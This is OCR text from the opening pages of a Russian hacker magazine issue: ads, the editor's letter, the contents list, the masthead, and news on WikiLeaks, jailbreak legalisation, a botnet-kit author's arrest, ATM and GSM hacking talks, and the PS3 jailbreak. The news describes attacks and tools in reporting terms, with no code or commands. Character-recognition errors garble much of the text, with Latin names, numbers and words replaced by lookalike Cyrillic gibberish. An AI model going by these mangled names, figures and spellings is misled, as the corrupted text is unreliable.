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БЫСТРЫЙ ВЗЛОМ ГОЛОДА! 




50% сотріеіесі 




Загружено: 100 % вкуса, 100 % пользы 



Открытъ еще один глазированный сырок "Зебра" 
после завершения загрузки 




Я сьгг :) 



у ери :) 



Взломай голод, пока он не взломал тебя! 

Ты ещё думаешь, как? 

Просто - с помощью глазированного сырка «Зебра»! 



Ищи на прилавках города! 







В прошлом месяце мы со Степом и Пандой Горл ездили 
наСНао5Соп5Ігис(іоп5: впервыеза время проведения 
этого мероприятия. Не подумай, что у нас появился 
большой интерес кдемосцене — причиной поездки 
стала весьма солидная секция презентаций по ІТ- 
безопасности, которую представляли, втом числе, трое 
наших авторов: Алексей Синцов, Дмитрий Евтеев и 
Владимир Воронцов. На СС вообще в этом году собралась 
большая тусовка увлеченных ИВ людей, а многие из 
спикеров могли бы отлично выступить науровне больших 
международных конференций. 

В общем, поездка была супер: послушали отличные 



презентации и суперски попили пива. Асамое главное: 
появилосьощущение, что усилиями организаторов СС в 
России появляется большая, интересная конфа, которая 
способна в будущем мутировать во что-то уровня если не 
Оеіюоп и ВІаскНаСто, по крайней мере, НІТВ :). 

пікНогг, 

гл.ред.Х 

ибаіке.ііѵеригпаксот 
Ы:1:р://ѵкоп1:ак1:е.ги/сІиЫ 0933209 

* Что это за штука? Все просто — это «живая Зй метка», которую 
специально для нашего журнала сделала компания ЕІідоѴізіоп. 
Заценить ее очень просто: возьми с нашего ОѴОлибо по 
адресу ѵѵѵѵѵѵ.хакер.ги/ЗсІ та гкегз/ программу под ѴѴіп б оѵѵз 
или бтих, поднесижурнал ксвоей ѵѵеЬ-камере иты увидишь, 
какжурнальная страница оживет и на месте метки появится 
забавнаятрехмерная анимация. 

Узнать больше о компании ЕІідоѴізіоп и скачать другие Зб-метки 
можно на сайте ѵѵѵѵѵѵ.еІідоѵІБІоп. ги . 
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004 Все новое за последний месяц 

РЕШИ. 

016 Ноутбук-бамбук 

Обзор ноутбука А51І5 11430с 

018 Медиаплееры ВВК 

Обзорлинейки НО-плееров 

020 Памятка для АМР 

Тест памяти БОВЗ 

РС_2 (ЖЕ . 

025 Колонка редатора 

Что может рассказать реестр? 

026 Визуальный программинг 

Конструируем приложения с помощью НіАзт 

030 Веб-камера на сервоприводах 

Совмещаем простой код и железо с помощью Агбиіпо 

034 Сберечь телефонный баланс 

Поднимаем систему обратного дозвона СаІІЬаск 

взлом . 

038 Еа$у-Наск 

Хакерские секреты простых вещей 

042 Обзор эксплоитов 

Разбираем свежиеуязвимости 

048 Социальная реальность 

БЕТ — лучший набор гениального хакера 

054 Наши на НІТВ 

Мировые достижения элитного взлома 

060 Лабораторный практикум по Меіазріоіі Ргатеѵѵогк 

Скрытые фишки М5Е 

066 Нокаут для А01 

Получаем привилегии рута на сервере корпорации АОІ_ 

070 Х-Тооіз 

Программы для взлома 

МАІШКЕ . 

072 Краш-тест антивирусов: тройная пенетрация 

І\ІосІ32 р АѵазГ Аѵіга: проверим их на стрессоустойчивость 

076 ][-препарация: вскрываем хитрый Заіііу.аа 

Учимся распознавать полиморфизм и обфускацию 
кода на примере известного вируса 



СЦЕНА. 


080 


Параллели ІТ-бизнеса 

История компании Рагаііеіз 


юниксойд. 


086 


Термоядерный синтез 

Обзор патчей для Ыпих, не входящих в ванильное ядро 


092 


Плюс 100 к защите 

Круговая оборона Ыпихдесктопа 


098 


Особенности национальной конспирации 

Шифруем диски с помощью БІЖБ/сІпп-сгурС ТгиеСгурІ: и ЕпсЕБ 


103 


Самый маленький ѴРИ 

Выбираем простое и легковесное ѴРЫ-решение 


кодинг. 


108 


Кодим на РуОюп по-функциональному 

Познаем силу функциональной парадигмы программирования 


112 


ѴѴТРѴѴСР? 

ѴѴіпсІоѵѵзСоппппипісабоп Еоипбабоп: сложные 
транзакционные системы по-быстрому 


116 


Самопальный МЗМ-клиентна сишарпе 

Готовим почву для создания антиамериканского ІМ-спамера 


119 


Программерские типсы и триксы 

Спецвыпуск: трюки для (не очень] начинающих системщиков 


ЗУИ/АСК . 


122 


«Живой» бэкап линуксового сервера 

Обзор средств для резервного копирования 
и создания иѵеПѴ0/иѵеС5В 


126 


Что нового в Ай СЗ? 

СегбГса1:е5егѵісе5вѴѴіпбо\л/5 5еіл/ег2008 Р2ѵз. 
ѴѴі псіоѵѵз 5егл/ег 2003 


130 


Риски системного администратора 

Семь и еще один способ подвести сисадмина под монастырь 


юниты 


134 


РЗУСНО: Бояться нельзя игнорировать 

Страхи, фобии и их вариации: эмоции, отравляющиежизнь, или 
приятная доза адреналина? 


140 


РАО ШЕР 

Большой ЕАО 


143 


Диско 

8.5 Гб всякой всячины 


144 


шт 

Удобные ѵѵеб-сервисы 








Наши на НІТВ 

Мировые достижения элитного взлома 
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Нокаут для АОЬ 

Мировые достижения элитного взлома 



Веб-камера на сервоприводах 

Совмещаем простой код и железо с помощью Агсіиіпо 
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Кодим на РуІІіоп по-функцио- 
нальному 



Познаем силу функциональной парадигмы 



программирования 



/РЕДАКЦИЯ 

>Главный редактор 

Никита «пікіІ 022 » Кислицин 
(пі кііогО геаі.хакер. ги] 

>Выпускающий редактор 

Николай«догІ»Андреев 

(догіитйгеаі.хакер.ги) 

>Редакторы рубрик 

ВЗЛОМ 

Дм итрий«РогЬ» Докучаев 
(ІогЬЙгеаІ. хакер. гиі 

РС_20МЕиІЛ\ІІТ5 

Степан «зіер» Ильин 
(зіерѲгеаІ. хакер, ги) 

КОДИ Н Г, МАЬѴѴАКЕ и 5УЫ/АСК 
Александр «Ог. Кіоипіг» Лозовский 
(аіеха псІегОгеаІ.хакер.ги) 

ЦМІХОЮи Р5УСН0 

Андрей «АпсІгизНоск» Матвеев 
(апсігизЬоскЙгеаІ.хакер.ги) 

>Литературный редактор 

Юлия Адасинская 

>Редактор хакер. ги 

Леонид Боголюбов (хайгеаі. хакер. ги) 

/АКТ 

>Арт-директор 

Евгений Новиков 
(поѵікоѵ.ейдатеіапсі.ги) 

>Верстальщик 

Вера Светлых 
(зѵеЛуНѲдатеІапсІ.ги) 

/йѴй 

>Выпускающий редактор 

Степан «5іер» Ильин (зІерѲгеаІ. хакер. ги) 



>Редактор ІІпіх-раздела 

Антон «Апб» Жуков 

>Монтаж видео 

Максим Трубицын 

/рцвызніыс 

(> датеЦапй 

>Учредитель 

ООО «Гейм Лэнд», 1 1 9021 , Москва, ул. 
Тимура Фрунзе, д. 1 1 , стр. 44-45 
Тел.: +7 (495) 935-7034 
Факс: +7 (495) 780-8824 

Генеральный директор 

Дмитрий Агарунов 

Управляющий директор 

Давид Шостак 

>Директор по развитию 

Паша Романовский 

>Директор по персоналу 

Татьяна Гудебская 

>Финансовый директор 

Анастасия Леонова 

Редакционный директор 

Дмитрий Ладыженский 

>РК-менеджер 

Наталья Л итвиновская 

>Директор по маркетингу 

Дмитрий Плющев 

Главный дизайнер 

Энди Тернбулл 

>Директор по производству 

Сергей Кучерявый 

/РЕКЛАМА 

/Тел.: (495) 935-7034, факс: (495) 780-8824 

>Директор группы САМЕ5 & 0І6ІТАІ. 

Евгения Горячева (догуасбеѵаѲдатеІапб.ги) 



>Менеджеры 

Ольга Емельянцева 
Мария Нестерова 
Мария Николаенко 

>Менеджер по продаже батеіапсі ТѴ 

Марина Румянцева 
(гитуапІзеѵаѲдаппеІапсІ.ги) 

>Работа с рекламными агентствами 

Лидия Стрекнева (зІгекпеѵаѲдатеІапсІ.ги) 

>Старший менеджер 

Светлана Пинчук 

>Менеджеры 

Надежда Гончарова 
Наталья Мистюкова 

>Директор группы спецпроектов 

Арсений Ашомко (азЬоткойдатеІапб.ги) 

>Старший трафик-менеджер 

Марья Алексеева (аІекзееѵаѲдатеІапб.ги) 

/ОТДЕЛ РЕАЛИЗАЦИИ 
СПЕЦПРОЕКТОВ 

>Директор 

Александр Коренфельд 
(когепІюІсШдатеІапсІ.ги) 

>Менеджеры 

Александр Гурьяшкин 
Светлана Мюллер 
Татьяна Яковлева 

/РАСПРОСТРАНЕНИЕ: 

/Тел.: (495) 935-4034, факс: (495) 780-8824 

>Директор по Дистрибуции 

Кошелева Т атьяна (козГіеІеѵа@датеІапсІ . ги) 

Гуководитель отдела подписки 

Г ончарова Марина 
(допсбагоѵа@датеІапсІ.ги) 

Гуководитель спецраспространения 

Лукичева Наталья (ІикісІіеѵа@датеІапб.ги) 



> Претензии и дополнительная инфа: 

В случае возникновения вопросов по 
качеству вложенных дисков .пишите по 
адресу: сІаіт@датеІапб.ги. 

> Горячая линия по подписке 

тел.: 8(800)200.3.999 
Бесплатно для звонящих из России 

> Для писем 

101000, Москва, 

Главпочтамт, а/я 652, Хакер 
Зарегистрировано в Министерстве 
Российской Федерации по делам печати, 
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«БіеЩѵаз Ріѵаз», Литва. 

Тираж ЮООООэкземпляров. 

Цена договорная. 

Мнение редакции не обязательно совпадает 
с мнением авторов. Редакция уведомляет: 
все материалы в номере предоставляются 
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привлечены к ответственности. Редакция в 
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МЕ6АЫЕѴѴ5 



Мария «Мірріі_і_» Нефедова мАША.мЕРЕооѵдгабі-с.ріі 




МЕ6АЫЕѴѴЗ 

ОБО ВСЕМ ЗА ПОСЛЕДНИЙ МЕСЯЦ 



ПРЕВРАЩАЕМ ЕТНЕРМЕТ В ѴѴІ-РІ 



Буйствотехнологического прогресса на 
глазах набираетобороты, и нам все чаще 
приходится сталкиваться с ситуациями, когда 
к Сети нужно подключить вовсе не комп, а, 
скажем, телевизор, медиаплеер или консоль. 
Согласись, втыкать кабель в каждый девайс в 
доме накладно, неудобно и неспортивно. Но 
как подружить технику с ѴѴі-Рі? Обычно с этим 
возникают проблемы: начинается шаманство 
сбубнами, перепрошивки, матюки и прочие 
«радости». Один из способов решения 
этой задачки — адаптер по имени Ыеідеаг 
ІІпіѵегзаІѴѴіРі Іпіегпеі Асіаріег (ѴѴЫСЕ2001]. 
Эта «шайтан-коробка» позволиттебе вместо 
ЕіЬегпеі-кабеля использовать ѴѴі-Рі 802.1 1 п, 
чтобы за считанные минуты «подружить» 



технику с беспроводной сетью. ѴѴІЧСЕ2001 
поддерживает практически любые девайсы с 
интерфейсом ЕОзегпеІ: на борту и моментально 
«найдет общий язык» с роутером, поддержи- 
вающим технологию ѴѴі-Рі Ргоіесіесі 5еІир 
(роутеры без ѴѴР5 с адаптером тоже скрестить 
можно, просто это отнимет чуть больше вре- 
мени]. Плюсов у гаджета от Ыеідеаг несколько, 
например, он нетребует дополнительного пи- 
тания, прекрасно работая и от 115В. Не нужны 
ему и диски с драйверами — благодаря техно- 
логии ІЧеідеаг РизЬ ‘І\Г Соппесі подключение 
происходит как процедура ріид-апб-ріау. На 
прилавках магазинов адаптер появится уже 
этой осенью по цене порядка 2000 рублей. 




Ученые из Лаборатории зрительной эргономики А выяснили, что шрифт 
Ѵегбапа наиболее безопасен для зрения. 




ЗЛОКЛЮЧЕНИЯ ѴѴІКИЕАК5 

Послетого, какскандально известный сайт ѴѴікіБеакз опубликовал на 
своих страницах файлы так называемого «афганского досье» (десятки 
тысяч секретных военных документов, рассказывающих о реальной 
ситуации в Афганистане], сам ресурс и его создатель Джулиан Эссенж 
сильно мешаютжить властям США. Поддержку Эссенджу, который сейчас 
вынужден скрывать свое местонахождение, решила оказать незабвенная 
Пиратская партия Швеции. Эти отчаянные люди предложили приютить на 
своем хостинге серверы ѴѴікіБеакз, а также пообещали посильную помощь 
в отражении юридических нападок. Зачем это нужно Пиратской партии? В 
Швеции скоро выборы в парламент, «пиратам»тоже нужен пиар :]. Ну и, ко- 
нечно, эти ребята действительно радеютза свободу информации. Джулиа- 
ну Эссенджу, в свою очередь, действительно не помешает поддержка (если 
«пираты» пройдут в парламент, ему, фактически, гарантирована подде- 
ржка на уровне властей Швеции] — неуспел он закончить дела в Швеции 
и покинуть страну, как власти объявили, что на имя Эссенджа выдан ордер. 
Основателя ѴѴікіБеакз обвинили в изнасиловании и сексуальныхдомога- 
тельствах. Разумеется, Джулиан дистанционно опровергэти обвинения, 
прислав е-таіі в редакцию газеты Оадепз ЫуЬеІег, а также заметил, что 
они появились в очень «интересное время». И тут же, словно по волшебс- 
тву, шведы сняли с него подозрения, а ордер был официально отозван. 



► 004 



ХАКЕР 10/141/ 10 










ѴѴіпзІоп ХЗ ѵѵіШ пеѵѵ сИагсоаІ Шег 



Отражение меня 

* ѴѴіпзІоп ХЗ с новым угольным фильтром 
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МЕ6АЫЕѴѴ5 



ЛЕГАЛИЗАЦИЯ ДЖЕЙЛ БРЕЙКИНГА И НЕ ТОЛЬКО 




В США есть одна интересная «традиция» — 
каждыетри года Бюро по авторским правам 
США (ТЬе 11.5. СоругідЫ; ОТТісе] при Библиотеке 



Конгресса рассматривает и одобряет исклю- 
чения из федерального закона, запрещаю- 
щего обход технических средств защиты от 
неавторизованного использования. В этом 
году как раз состоялось очередное рассмотре- 
ние, и были приняты новые поправки кзакону 
озащите прав в цифровую эпоху. Американс- 
кие власти неожиданно признали легальными 
следующие вещи: 

- программы, позволяющие запускать на 
телефоне софт, официально не разрешенный 
к использованию оператором или производи- 
телем телефона; 

- программы, позволяющие использовать 
телефон, залоченный под определенную сеть, 
в другой сети; 

- обход защиты от копирования ОѴВ-дисков, 
при условии легального, краткосрочного ис- 
пользования материала для создания новых 
работ, критики или комментирования, а также 
в общеобразовательных целях; 

- взлом защиты игр ЮРМ] в целях поиска 
уязвимостей; 

- взлом софта, защищенного аппаратным клю- 
чом, при условии, что такие девайсы вышли из 
обращения или более не производятся. 

Таким образом получается, что ЗаіІЬгеак для 



іРЬопетеперь легален, и даже взлом защиты 
БѴБ может быть ненаказуем. Арріе, в свою оче- 
редь, недовольно напоминает, что, взламывая 
свой смартфон, ты все равно лишаешь его та- 
ра нти и, та к как джейл брей кин г может при вести 
к самым разным «нестабильностям» в работе 
аппарата, за которые Арріе не отвечает. 
Болеетого, компания подала заявку на по- 
лучение нового патента, который в будущем 
позволит им отслеживать несанкционирован- 
ных пользователей, совершающих «подоз- 
рительные действия» со своими аппаратами. 
Зафиксировав «подозрительные действия», 
Арріе будет вправе собрать информацию о юзе- 
ре, определить местонахождение устройства 
(и самого пользователя], и даже заблокировать 
девайс и стереть с него информацию. Делается 
все это, конечно, под благовидным предло- 
гом — это не что иное, как за щита гаджетов 
от кражи (предусмотрено даже уведомление 
владельца аппарата посредством 5М5, е-таіі 
или голосовой почты]. Однако и обычным 
джейлбрейкнутым аппаратам, которые никто не 
крал, может не поздоровиться — дело в том, что 
ЗаіІЬгеак и отвязка отоператора попадают под 
категорию «подозрительных действий» чутьли 
не в первую очередь. 



Свято место пусто не бывает - появился первый ]5-троян под АпбгоісІ 0 . 
Инфекция получила обозначение Тгоіап-ЗМЗ.АпбгоісІОЗ.ГакеРІауег. 

НАЙДЕН И АРЕСТОВАН АВТОР «БАБОЧКИ» 

Инструментарий «Бабочка» (ВиНегГІу) — штука века, который вломился в ваш дом, мы арестова- в округе». Пока идет следствие, и неизвестно, 

широко известная вузких кругах. На основе«Ба- литого типа, который продал емулом, подробную какие именно обвинения будут предъявлены 
бочки» были созданы сотни ботнетов, включая карту местности и описание самых богатых домов Ізегсіо, и какое наказание ему грозит, 

такие гигантские зомби-сетки, как Магіроза, и 
тысячи вредоносных программ. Тулкит сумел 
стать одним из популярнейших в своем роде, так 
какдля его использования не нужно было быть 
«кулхацкером» и обладать специальными навы- 
ками или глубокими познаниями. По сути, за ю- 
затьего могпочти каждый, всеупиралосьлишь 
в деньги — В иііегііу продавался (и продается) в 
Сети по цене $500-1. 300. И вот из Штатов пришла 
удивительная новость: ФБР сообщило, что им 
совместное полицией Словении и Испанииуда- 
лось найти и задержать не очередного оператора 
ВиФегйу-ботнета, а самого автора злосчастного 
инструментария — 23-летнего хакера Ізегсіо (его 
имя пока не разглашается]. Парня арестовали в 
Мариборе вместе с еще двумя подозреваемыми, 
и на данный моментон отпущен под залог. Пред- 
ставители ФБР подчеркивают, что это первый 
арест непосредственно автора набора вредонос- 
ных программ, и гордо сообщают: «Вместо чело- 
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ДОБАВЬ ЯРКОСТИ 
ВПЕЧАТЛЕНИЯМ! 



Приятно делиться удивительны- 
ми моментами, ведь эмоции, 
о которых ты рассказываешь 
друзьям, становятся еще ярче! 
Смартфон Ю Оріітыз* позво- 
лит тебе в одно касание про- 
комментировать чей-то статус 
в «Одноклассниках» или вы- 
ложить «В Контакте» только 
что сделанную фотографию. 
И кто знает, может, это станет 
началом новой захватываю- 
щей истории? 




1.6 ортГгтюз 

ѵѵѵѵѵѵ.Ід.гіі 



ю 
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*Оптимус 



Информационная служба Ю ЕІесігопісз 8-800-200-76-76 (бесплатная горячая линия по России). ѵ/уѵѵѵ.Ід.ш 



НА ПРАВАХ РЕКЛАМЫ 




МЕ6АЫЕѴѴ5 



УПРАВЛЕНИЕ ТРОЯНОМ ЧЕРЕЗ СОЦИАЛЬНУЮ СЕТЬ 



Чего только не придумаютхакеры и вирусмейкеры, 
чтобы облегчить жизнь себе и усложнить ее дру- 
гим. Изучаятроян из семейства «Вгагіііап Вапкег», 
который, как понятно из названия, «работает» по 
банкам Бразилии и Латинской Америки, специалисты 
из РЗА’з ЕгаисІАсІіоп Резеагсб Баб обнаружили, что 
управляется малварь нетривиальным способом. В ка- 
честве админки вредоносная софтина использовала 
социальную сеть (какую именно, названо не было, но 
в приведенныхскриншотах многие опознали Огкиі). 
Для управления трояном в«социалке»был создал 



фейковый аккаунт по имени «Апа Магіа», в профиль 
которого в виде обычного текста были загружены 
зашифрованные инструкции для зловреда. То есть, 
заразив машину пользователя, «инфекция» лезла в 
социальную сеть и искала там профиль, начинающий- 
ся со строки «ЕІОШЕ». Послеуказанной строчки в 
профайле шла зашифрованная инструкция, которую 
троянецдешифровал и принимался исполнять. И это 
уже далеко не первый случай, когда вредоносный софт 
использует социальные сети или иные популярные 
сервисы в качестве «командного пункта». 





Астрономическую сумму, $ 88,5 млн., компания ВІінагсІ отсудила 
у американки Элисон Рив .поднявшей пиратские серверы для игры ѴоѴ . 
За каждого из 427.393 игроков женщину оштрафовали на 



ОРИГИНАЛЬНЫЙ ПОДХОД К ВЗЛОМУ БАНКОМАТОВ 




На недавно состоявшейся в Лас-Вегасе конференции 
Віаск НаТ было много интересных докладов и выступ- 
лений, но специалист по сетевой безопасности, Джек 
Барнаби, сумел выделиться даже на этом фоне. На 
Віаск Наі Барнаби поведал о новых способах взлома 
банкоматов, узнать о которых емуудалось... купив с 
аукциона два банкомата компаний ТгапахТесбпоІодіез 
иТгііоп в личное пользование. Провозившись с маши- 
нами больше года, буквально разобрав их по винтику 
и собрав обратно, хакер нашел два новых способа 
извлечь из них заветные зеленые бумажки. Увы, в 
открытый доступ свои наработки он выкладывать не 
стал, поэтому о методах взлома говорить можно лишьс 
его слов. В аппарате ТгапахТесбпоІодіез Барнаби об- 
наружил критическую уязвимость удаленного доступа, 
для использования которой написал эксплойт ОіШпдег. 
С помощьютелефонного модема и ОіШпдегможно 



получить полный доступ ксистеме без необходимос- 
ти ввода пароля. В банкоматТгіІоп, в свою очередь, 
удалось внедрить бэкдорЗсгооде (тоже написанный 
самим Барнаби). Дело втом, что материнская плата 
Тгііоп оказаласьзащищена стандартным (неуникаль- 
ным) ключом, который исследователь спокойно купил 
в Сети за 10 баксов. Вызвать«кжизни» внедренный и 
надежно спрятанный от«глаз» операционной системы 
бэкдор можно либо специальной картой, либо нажа- 
тием определенной комбинации кнопок. Информацию 
о найденныхуязвимостях Барнаби заблаговременно 
передал производителям банкоматов; компания Тгііоп 
быстро приняла меры, а вотТгапахТесбпоІодіезхранит 
подозрительное молчание. Похоже, чтоТгапахзакрыли 
«дырку» в новых АТМ, а вотуже установленные маши- 
ны обновить до сих пор не соизволили. 



НОВЫЙ КМОП - МЕНЬШЕ, ЛЕГЧЕ, БЫСТРЕЕ 



Атагоп в очередной раз обновил свои электрон- 
ные книжки: вслед за новым КіпсІІе БХ вышли и 
обычные КіпсІІе третьего поколения. Моделей 
всего две: КіпсІІе ѴѴі-Еі и КіпсІІе ЗС + ѴѴі-Еі. Обе 
модификации получили новыеб-дюймовыедис- 
плеи с разрешением 600x800 пикселей. Атагоп 
гордо сообщает, что их контрастность на целых 
50% превосходит контрастность других ебуков 
(контраст стал 10:1 вместо старых 6:1), а также 
экраны небликуюти порадуют юзеров более чет- 
кими итемными шрифтами. Сильные изменения 
претерпели и корпуса девайсов, теперь представ- 
ленные в графитовом цвете. Электронные книжки 
заметно похудели — толщинауменьшилась на 
21 %, а масса — на 1 7%. Габариты обеих моделей 



теперь равны 190x1 22x8 мм, а вес составляет 241 
грамм. Но где-то уменьшилось, а где-то и при- 
росло— вырос объем встроенной памяти, теперь 
он равен 4 Гб (то есть, на читалку войдет порядка 
3.500 электронных книжек), а скорость перелис- 
тывания страницулучшилась на 20%. Не обошли 
вниманием и софтверную составляющую: теперь 
КіпсІІе комплектуются улучшенным просмотрщи- 
ком документов РОЕ и новым эксперименталь- 
ным браузером на основе движка ѴѴеЬКіІ. Цена 
читалок, до сих пор официально недоступных в 
России, ощутимо снизилась и теперь составляет 
$139 за модификацию с ѴѴі-Еі и $189 за 30+ ѴѴі-Еі 
модель. Чего только не сделаешь, чтобы угнаться 
за ІЧоок. 
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Х-Іе$1іпд сопіезі 



О Журнал Хакер представляет конкурс по поиску багов в бета-версии 
ІВМ Ьоіиз Зуплрбопу 3. Покажи себя в деле — и выиграй поездку в США 
на конференцию І_ойі$р!іеге в январе 2011 года! 




Все, что нужно для участия в конкурсе — установить 
І.оІи$ Зутрбопу Веіа 3 и зарегистрироваться на сайте 
Іоіиз.хакер.ги . Дальше все зависит от тебя: чем больше 
и интересней ошибки ты найдешь, тем больше у тебя 
шансы выиграть крутые призы! 





МЕ6АЫЕѴѴ5 



63М-СЕТИ ОПУТАЛ «КРАКЕН» 



В прошлом номере мы писали обумельцах, которые 
наделали много шума, вскрыв алгоритм шифрова- 
ния Р04, использующийся в Зкуре. Сегодня позволь 
рассказать тебе о группе независимых разработ- 
чиков открытого ПО, возглавляемой норвежским 
программистом Фрэнком Стивенсоном. В ходе 
конференции Віаск Наіэти ребята представили миру 
свои наработки — систему Кгакеп, способную взло- 
мать алгоритм шифрования А5/1 , используемый в 
большинстве СВМ-сетей, и утилиту АігРгоЬе, позво- 
ляющую записывать и раскодировать переговоры и 
5М5. Разработчики «Кракена» объясняют, что взлом 
А5/1 был возможен и ранее, но этот процесс был 
весьма долог, а скорость в работе криптографическо- 
го софта решаетвсе. Теперь, когда Кгакеп доработан, 
на подбор ключей, которыми шифруются 5М5 и 
переговоры, у него уходит отЗОсекунддо пары минут. 
Кгакеп работаете радужным и таблица ми общим 
объемом 1 ,7Тб, которые доступны в Сети в открытом 
доступе (в частности, в торрентах]. Принимающий 
участие в проекте криптограф Карстен Нол заявил: 



« С итуа ци я вокруг 0 5 М -ха кин га сейчас входит в 
стадию скрип-киддисов; это аналогичнотому, что 
нескольколетназадпроисходилосѴѴі-Рі-сетями — 
тогда почти все стали пытались взломать соседский 
ѴѴі-Рі. В случае сѴѴі-Рі шифрование сменили на ѴѴРА 
и,я надеюсь, что с 05М произойдет™ же самое». 
Дело втом, что Кгакеп, равно каки АігРгоЬе, спокой- 
но лежит в открытом доступе, и воспользоваться им, 
а также принять участие в его доработке и улучше- 
нии может практически каждый. Для фактической 
прослушки чужих переговоров, конечно, понадо- 
бится еще и «железная»сосгавляющая, которую 
разработчики не предоставляют, нежелая попасть 
под суд. Но никакихсверхтребований каппаратной 
части нет, купить все нужное может, опять же, любой, 
а там, не ровен час, и восточные братья выпустят 
в продажу готовые наборы, приобрести которые 
можно будетза символическую плату в онлайн-ма- 
газинах (подобными китами для ѴѴі-Рі-сетей при- 
торговывают давно]. Ногл рассказал, что достаточно 
куп ить программируемый радио-модульдля ПКи 




взять на вооружение Кгакеп с криптографическими 
таблицами и АігргоЬе. Никаких гарантий разработ- 
чики, тем не менее, не да ют, хоть и утверждают, что 
их ПО полностью работоспособно. Интересно, что 
и на недавно состоявшейся конференции Оеіооп 
тоже был показан недорогой (около $1 .500] прототип 
перехватчика разговоров в 05 М -сетях. Автор 
устройства, Крис Пагет, прямо на конференции 
продемонстрировал работу девайса и объяснил 
принцип его работы: перехватчикмаскируется под 
обычную вышку-ретранслятор сети оператора АТ&Т, 
тем самым обманывая телефон и принуждая его 
«поделиться» информацией об аіаивном звонке. 




АННИГИЛЯТОР ДАННЫХ ОТ Т05НІВА 



КомпанияТозЫЬа поведала мируосвоей новой 
разработке в области защиты информации. Новая 
система автоматического удаления данных сжестких 
дисков получила говорящее название ѴѴіре («унич- 
тожение», «стирание»]. Основная фишка ѴѴіре втом, 
что ее можно на строить таким образом, чтобы даже в 
случае банального отключения питания компьютера 
или при изъятии из него жесткого диска, данные почти 
моментальноуничтожались. Новая система будет 



реализована на накопителяхТозЫЬа с поддержкой аппа- 
ратного шифрования данных (Зеіі-Епсгурбпд 0гіѵе,5Е0], 
анонсированных чуть ранее. Какэто работает? Просто и 
изящно: информация на НБОхранится взашифрован- 
ном виде, и в случае какого-либо ЧП ключ шифрования, 
который, напоминаем, генерируется самим «винтом», 
стирается. И никакого тебе медленного и мучительного 
удаления данных и, ужтем более, не нужноучинять над 
ИОО физической расправы. 



Компания ВіШеТепсІег с грустью сообщает, что у 75% пользователей пароль 
от почтового ящика совпадает с паролем к аккаунтам в социальных сетях. 



ЗАЩИТА РЗЗ ПАЛА 



Интересные новости для геймеров — команды сайтов рзх-зсепе.сот и 
огтосІсЫрз.сопп рапортуют, что защита РІауЗіаЬоп 3 наконец-то дала серьезную 
трещину. Благодаря девайсу Р5 3 а і I Ь ге а к , представляющему собой ІІ5В-донгл, 
стало возможно создавать дампы игр, загружать бекапы со встроенного жест- 
кого диска и устанавливать на консоль пиратское ПО. Факт взлома доподлинно 
подтвержден парнями из Р5Х Зсепе (на их сайте есть видео], но в Оети кур- 
сируют слухи, что работает это только на беЬид-версии Р53. Опровергнуть или 
подтвердить этот слух пока никто не может, так как неизвестно, какой именно 
эксплойт использует Р5 ЗаіІЬгеак. Впрочем, на сайте рз]аі[Ьгеак.сот . где можно 
приобрести заветный чип, заявлена поддержка РАТ- и 5І_ІМ-версий и всех 
регионов. Цена донгла пока «кусается»: в среднем она составляет $130 за штуку. 
Но, судя по всему, это не останавливает покупателей — у многих дистрибьюто- 
ров уже разобрали весь запас, и на модчип образовалась очередь. Наверняка в 
скором времени 5опу закроет эту уязвимость, выпустив обновление прошивки, 
чип подешевеет, и у него появятся клоны, но все это уже не отменит того факта, 
что защиту Р53 сумели взломать. Она держалась три года! Почти историческое 
событие :]. 






► 010 
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РІ.АѴ ► РА5Т, 
ИЛИ ЬЕУЕЬ ОР 
ДЛЯ ИГРУШЕК 



На нашем йѴй ты найдешь 
пример дистрибутива игры, 
распространяемого через 
технологию РІауРазІ. 



Прогрессивная технология покупки игр 



Представь себе ситуацию. Ты начина- 
ешь ставить винду, но вместо муторного 
ожидания конца установки, получаешь 
вполне работоспособную систему уже 
через несколько минут. Мастер ста- 
вит только самое необходимое, а все 
остальное инсталлит в фоне, по мере 
необходимости. Минимум ожидания, 
максимум удобства. Увы, идея пока 
фантастическая, но это лишь для опе- 
рационок. Ребята из немецко-русской 
компании ОідіІаІБоІиІіопз реализовали 
такую фишку для игр. 




Вот ведь как бывает. Еще каких-то десять лет назад, чтобы порубиться в 
дополнение ЗЕагсгабІ: непременно понадобился бы диске игрой. Играли в 
основном полокалке: для битв онлайн серьезной преградой становились 
большие задержки и узкий канал. Асейчас? Слово «мегабит» так прочно 
обосновалось в нашей жизни, что мы уже стали забывать, когда в последний 
раз покупали диски. В инете стало нетолько комфортно играть в мульти- 
плеер, но отсюда же скачивать сами игры. И речьтутдаженеопресловутых 
ІюггепГах, где можно достать любую новинку (хотя и часто фигово поломан- 
ную]. Появилисьтехнологии, позволяющие скачать лишь 5-10%, скажем, 
увесистого дистрибутива Зіагсга ТС II и сразу приступать к его прохождению. 
Такиетехнологичные штуки мы любим :). 

Все когда-то начиналось с продажи лицензионной музыки. Дальше, когда 
скорости соединения подросли, стало возможным продавать еще и видео. 
Бестолковые онлайн-магазины сменилисьудобными сервисами вроде 
АррІе.ТѴ, позволяющими подкачивать видео прямо во время просмотра: 
картинка в Н 0-качестве в потоковом режиме — это сверхудобно. Продавцы 
игр также не стояли в стороне: вместо того, чтобы бежать в магазин многие 
геймеры стали приобретать игры прямо в Интернете. Удобные сервисы 
Зіеат иХЬох І_іѵе Магкеіріасе, позволяющиеудобно купить, скачать, 
установить любую экшн или стратегию, а потом поиграть с другими людьми 
быстро стали обыденным делом для десятков миллионов человек. Это легко 
понять: в Сети игры стоят дешевле в среднем на 20-30 процентов, поскольку 
издатель не тратится на производство дисков и доставку в магазины. В 
результате получается экономить нетолько время на вылазку в магазин, но 
еще и ощутимые деньги на покупке. 

Но то запад, у нас же — каналы пока не такие широкие, чтобы быстро ска- 
чать 8 Гб дистрибутив свежей новинки. Пока стянешь тяжелую игру (а это 
легко может занять 8-10 часов], пропадет всякое желание в нее играть. 



Вот если бы добавить сюда «потоковое вещание», как для видео.... Ребята 
из Оідііаі Зоіибопз нашли выход. В результате экспериментов, был создан 
механизм РІауРазі [ ѵууѵуѵ.рІаѵІазГги ]. позволяющий резать игру на части и 
сжимать большие объемы данных при передаче. Главная фишка в том, что 
начать пользовать игрой можно, скачав небольшую часть общего объема. 
Это основной момент. Большая часть игры докачивается незаметно в 
фоновом режиме, никак не мешая геймплею, в то время как ты уже давно 
играешь. Плавная дозагрузка — фирменная фишка системы: в зависимос- 
ти от «толщины» интернет-канала РІауРазІ; рассчитает, какую часть дист- 
рибутива залить на твой компьютер, чтобы дальнейшая закачка проходила 
незаметно и без тормозов. Если канал достаточно широк, ты получишь 
